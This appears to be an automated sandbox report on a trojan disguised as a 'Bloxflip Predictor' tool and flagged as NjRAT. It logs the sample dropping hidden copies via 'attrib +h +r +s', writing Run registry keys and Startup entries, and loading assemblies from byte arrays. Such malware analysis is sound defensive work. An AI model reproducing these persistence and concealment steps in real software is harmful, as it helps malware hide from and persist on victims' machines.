          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: classification engineClassification label: mal100.phis.troj.adwa.evad.winEXE@14/6@2/2
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 2_2_05EE2B2E AdjustTokenPrivileges,2_2_05EE2B2E
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 2_2_05EE2AF7 AdjustTokenPrivileges,2_2_05EE2AF7
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnkJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
          Source: C:\Windows\Bloxflip Predictor.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4796:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
          Source: C:\Windows\Bloxflip Predictor.exeMutant created: \Sessions\1\BaseNamedObjects\Windows
          Source: Bloxflip Predictor.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Bloxflip Predictor.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Bloxflip Predictor.exeReversingLabs: Detection: 84%
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile read: C:\Users\user\Desktop\Bloxflip Predictor.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Bloxflip Predictor.exe "C:\Users\user\Desktop\Bloxflip Predictor.exe"
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess created: C:\Windows\Bloxflip Predictor.exe "C:\Windows\Bloxflip Predictor.exe"
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe"
          Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
          Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\Bloxflip Predictor.exe "C:\Windows\Bloxflip Predictor.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess created: C:\Windows\Bloxflip Predictor.exe "C:\Windows\Bloxflip Predictor.exe" Jump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe"Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +r +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: security.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
          Source: Bloxflip Predictor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: Bloxflip Predictor.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Bloxflip Predictor.exe, L.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: Bloxflip Predictor.exe.1.dr, L.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, L.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: Windows.exe.2.dr, L.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeExecutable created and started: C:\Windows\Bloxflip Predictor.exeJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess created: attrib.exe
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: attrib.exe
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: attrib.exe
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess created: attrib.exeJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: attrib.exeJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess created: attrib.exeJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeJump to dropped file
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile created: C:\Windows\Bloxflip Predictor.exeJump to dropped file
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile created: C:\Windows\Bloxflip Predictor.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows2Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows2Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeJump to dropped file
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnkJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnkJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows2Jump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows2Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows2Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows2Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows2Jump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows2Jump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Bloxflip Predictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
